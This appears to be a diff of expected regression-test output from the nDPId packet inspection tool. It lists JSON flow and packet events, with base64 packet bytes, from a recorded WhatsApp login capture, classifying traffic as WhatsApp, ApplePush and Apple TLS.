-02432{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1432582228503,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1432582228503,"pkt":"xiwDYGpkAPS5Jrv0CABFAAXUnXJAAEAG3ojAqAIEEW7lDsApFGe4aEuG1IsaTIAQIAA3PgAAAQEICi36MxJvhmvfFwMBACDgnfLWgV8g\/pw7jjX\/\/3ZDH1tB+gK1jE9k\/rmu6RmKPhcDAQdQwvKiQZwynx6ML8uHDg8WgbZIBNPdSiBPAiHm7VZMSxjHJ7BGJ8hRCNCOXC6LyliytHBkvL\/WQAE0iyMMgIlOMed9vHW1FQrPwtxifubqT35jWP9Nwm9hOQ2sUXPF6J6ZcqeRRxjts4LAxUp+ZVHbqO88UycvtArFRoKmsjwuTsOHFL0h\/BX9z3nWEUxaS9mVyhudzOuBlhf3aNgcppeJ3Mr6DsSPYDWrJ1Ko6GUQ6Mz7WhKyRp+OhCR+8vNcJ+2CIpa9aPiStGZvZFFuJ5eoJiBK6lrgPDyxxPa\/Z82Zx7iZHY+\/ajmPTXvQU4j7rC5OlL\/ZO1JkHVVmXmK1\/n5cUDYPvmxuWKEEWDx8eNxgRC58OMj0i5sHQHDG+ZLwIW4R3Ebyfp++7DjTwhy7uHM9lVzOAa6qgVVbeWZWLm5Zp4udgSHyIGs6plbNOhN8Lb7TTV3BFKBjCbwxtnCR+8lPTlOVAewtoM48Z0qRSJODl9LDmyJOnkTl+LQlbM7hWhZq\/VVyYDivHB+RnYZFdt7ZvWbMsFi9dXD6LjMsdLkj0RU\/SFA5gXvUGWy9x04Yo\/WqRH7ng0WIs\/oAxdVKAH0RL\/egfgAwRrcRgu3dPMqb8b19+PmNfa+WFGFnW0JLuexKCM9POmeD5yw6nk\/ac9Raq2rKcykqXxndrastmOjTbplC4qeRqr0LASV9tRAtG4WvYwC\/dfTiBawq859mBNGrglJvult9KPMKQPFULDG6x+KBv4eYpxjRc54qoabZQMWqqc+\/C0Emvy+eYJXsquvu+83ilyZ2N5sYlJ92HKH8JfE8JTIg5o3c9zLm5ZWhw8+NmQMwd0i5bU9vg06cROWuAG\/JN1YaR0pdUTITubm5mlduwzPQc2BVmXII2GZu105+s7qlJpQzMmRVjoqYtbOeWHJKIQ4UQdZCqzpz4AcWUN7LNHzsfvI5B8mXgc+B7aL8Y8jc2YqBmFk1dHfnjKeYCxGmRBZHJy7WbY9uViabjXvTq6pmYIGh+8lsYGwBwhWNapwWuc8Bw0b65ZKVGVcMKolOabscbWi+EYPJjuvFKgqZscrMC1dXZUtfdGPsPdXUlxbBMQ2Kup7KMqRXjqDlL2rJPpRC\/J6FfjQ+IKNfM\/RVAKV8teQWPRPthAH1FIrtEy51cDQixMgza8uftMRBKRfqEYXF7XVD5164o\/Mck2RudrQlyQmifMkcXuuW1kb2sTQoTz3p0Ox09YvEjxH+5SXf2MqAQ5cwiqd8fGHwSVuprE4y5B+B+0nEsRucTP\/97X6ZaOAcSRCuPQgdHN1NHCSQ8002IEFsPCRXQaWhb\/8KMjfJXXs1I3Eouoy5fGg9Eon7zV6InzJDOtmcVxRzUBgfDR1DGBIMOusKSnnAX1htfNBhCsM31KRySVA9BnU7p8tKS\/3BfJCTQQBoGTP2MoOxAiFKkSgXEh3w0kC\/x4kpimxmzxtGXOOQBZWNBgxyNTYgb0Sf9nOE+sqmGbSG7xueIM5u7Dd864xcMPmVsE1VcOkz2PMHbXIHe+roLyX2aqyb6Yu22cChJiPbSlY+mRr9siD+E7u3KnznXJcpEJBSd3utMm4QryOQBR9FCdalU2IyjVmAb148IpK6Ghgjmw7oVrHdCZXaVw+zfL1FhqC9Bd1VFHiBGm211UlGgrjedJW7mv5NM2z0cPLUMCaZycFw6G4KQN6aDAE1rL1eqhrIxxsuhCw0HsrKiJLLdGsa1+3Rf\/uEKt1c0Ng9dAzkrCJEwEwHx3trkLyhj9\/ja7mEqYBSp5Sx0mCtwBbfi6wnI8gTgb3WlgH0Ha3ke8bRCbeKw4dCUR0GSPUQYm4lO6VKKERImy3aoUDOHbtquSKZKUtb1hVt"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582228503,"flow_last_seen":1432582228503,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1432582228503,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} -01125{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1432582228504,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":540,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":540,"pkt_l4_len":506,"thread_ts_msec":1432582228504,"pkt":"xiwDYGpkAPS5Jrv0CABFAAIO1F9AAEAGq2HAqAIEEW7lDsApFGe4aFEm1IsaTIAYIACssAAAAQEICi36MxJvhmvfY2JtdD6CZ3s26zaizYDBa1\/xV9+nfluOxtxa1tx195Jafsz52yXEOESrPvfo4L8JAAp0DYIaansHyOlB83T10iMEgMWpntVaGhVYz7Ui4c09FkbWN9q+65\/aqUq4TUrgzMyqE5QUWhXZSc\/uGC0icKHu+b2FL4NHGUs7nYDs8Xc0v0flHk5486jecRIc\/ROiqHyACG3C0wwDLYD5dPHsc+oO3YTdMQHp\/Y5aWShkoF9bF0dA6YegCOYLbVQKFU7DAdWxqhRRjje8xXf+tC7iVD+agcMxzHZHBdPvzUlsa6Hnp2KvOrzs9LBI3\/AlWnTDSOZNp+mWgK4MB2zxE5cEBsbimybYF8snsRtPtIBkMUfF1XAd9wg4sSCboXV1ik63xPuzTMdOxIRWWE26PTSksHKRu47JqvdF18Y85LvvQvIIft9jAMxZNM1JpDNK3xHTwcbI8OJ5ZzkwaDArtx1Yo+du+Za4kNeW1j1f7jlL58\/xs\/9pH231BKAPZrpjtiVLnSRVafACBd5M5lgbO1u\/aSBlmIQ\/UK6DM\/jen1DGM+xWiz3ABAYXKSpL6XfsJZ+dpwtcFktAw18x3fF8GSC0\/zgV+SA55WfIkN+qTLtYiq6ct7jHTceCT8cS"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582227643,"flow_last_seen":1432582228593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1432582228593,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1432582228753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582228753,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0JuMAAC8Gq7gRbuUOwKgCBBRnwCnUixpMuGhRJoAQAQ6R7QAAAQEICm+GjQ4t+jMS"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582230648,"flow_last_seen":1432582230648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582230648,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1432582230648,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582230648,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAZppAAEAGvV7AqAIEEa1CZsA0AbuMr4Y\/AAAAALAC\/\/\/iDQAAAgQFtAEDAwQBAQgKLfo7WAAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1432582230787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582230787,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0jEsAAO8GKLkRrUJmwKgCBAG7wDR81DyUjK+GQIASH\/6qEgAAAgQFoAEDAwQBAQQC"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1432582230854,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582230854,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoLotAAEAG9YXAqAIEEa1CZsA0AbuMr4ZAfNQ8lVAQQADKywAA"} -00991{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582230648,"flow_last_seen":1432582230862,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1432582230862,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":148,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1432582230648,"flow_last_seen":1432582231003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1432582231003,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582233314,"flow_last_seen":1432582233314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582233314,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.8","src_port":49192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1432582233314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582233314,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0kh5AAEAGATfAqAIEXbqHCMAoAFBgmxszxhyTY4ARIABAdgAAAQEICi36RbdjLQIx"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1432582233380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582233380,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0ewoAADkGX0tduocIwKgCBABQwCjGHJNjYJsbNIAQAebnbwAAAQEICmMteVEt+kW3"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1432582233490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582233490,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0ewsAADkGX0pduocIwKgCBABQwCjGHJNjYJsbNIARAebnAQAAAQEICmMteb4t+kW3"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":199,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582233751,"flow_last_seen":1432582233751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582233751,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.49","src_port":49191,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1432582233751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582233751,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoI\/dAAEAG3k\/AqAIEEaxkMcAnAbsMJFozPw\/LbVAR\/\/9EkwAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1432582233884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582233884,"pkt":"APS5Jrv0xiwDYGpkCABFAAAo+xIAAO8GmDMRrGQxwKgCBAG7wCc\/D8ttDCRaNFARn\/6kkwAA"} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1432582233926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582233926,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoy8lAAEAGNn3AqAIEEaxkMcAnAbsMJFo0Pw\/LblAQ\/\/9EkgAA"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582234869,"flow_last_seen":1432582234869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582234869,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.52","src_port":49182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1432582234869,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582234869,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAohHZAAEAGfc3AqAIEEaxkNMAeAbsiAVkzu7svv1AR\/\/9OvgAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1432582235010,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582235010,"pkt":"APS5Jrv0xiwDYGpkCABFAAAoaq4AAO4GKZURrGQ0wKgCBAG7wB67uy+\/IgFZNFARn\/6uvgAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1432582235028,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582235028,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAosCtAAEAGUhjAqAIEEaxkNMAeAbsiAVk0u7svwFAQ\/\/9OvQAA"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582235998,"flow_last_seen":1432582235998,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582235998,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.37","src_port":49181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1432582235998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582235998,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoLkpAAEAG1AjAqAIEEaxkJcAdAbtiYuGVG2ODH1AR\/\/\/TAgAA"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":211,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582235999,"flow_last_seen":1432582235999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582235999,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.59","src_port":49180,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1432582235999,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582235999,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoEt9AAEAG713AqAIEEaxkO8AcAbueodpQe0gK3VAR\/\/+2UAAA"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1432582236140,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582236140,"pkt":"APS5Jrv0xiwDYGpkCABFAAAoyysAAO8GyCYRrGQlwKgCBAG7wB0bY4MfYmLhllARn\/4zAwAA"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1432582236144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582236144,"pkt":"APS5Jrv0xiwDYGpkCABFAAAoKcoAAO4GanIRrGQ7wKgCBAG7wBx7SArdnqHaUVARn\/4WUQAA"} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1432582236282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582236282,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoLwpAAEAG00jAqAIEEaxkJcAdAbtiYuGWG2ODIFAQ\/\/\/TAQAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1432582236282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582236282,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoODNAAEAGygnAqAIEEaxkO8AcAbueodpRe0gK3lAQ\/\/+2TwAA"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227643,"flow_last_seen":1432582227643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582227643,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1432582227643,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582227643,"pkt":"xiwDYGpkAPS5Jrv0CABFAABACXVAAEAGAsTAqAIEuK2zJcAyFGaCPuKZAAAAALAC\/\/9xPwAAAgQFtAEDAwQBAQgKLfov1AAAAAAEAgAA"} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1432582227797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432582227797,"pkt":"APS5Jrv0xiwDYGpkCABFAAA8rYsAADQGqrG4rbMlwKgCBBRmwDLYm8Xcgj7imqAS\/\/9JMQAAAgQFrAEDAwkEAggKD\/GKmy36L9Q="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227884,"flow_last_seen":1432582227884,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582227884,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.14","src_port":49203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1432582227884,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582227884,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAKwpAAEAG00HAqAIEEbJoDsAzAbunfDOjAAAAALAC\/\/\/+yQAAAgQFtAEDAwQBAQgKLfowvwAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1432582227885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582227885,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0779AAEAGHIXAqAIEuK2zJcAyFGaCPuKa2JvF3YAQIFhWrQAAAQEICi36MMYP8Yqb"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1432582227886,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582227886,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0rZoAAO4G4r4RsmgMwKgCBAG7wDE71dh745uf14ASH\/64\/gAAAgQFoAEDAwQBAQQC"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1432582227887,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582227887,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo79dAAEAGDo7AqAIEEbJoDMAxAbvjm5\/XO9XYfFAQQADZtwAA"} 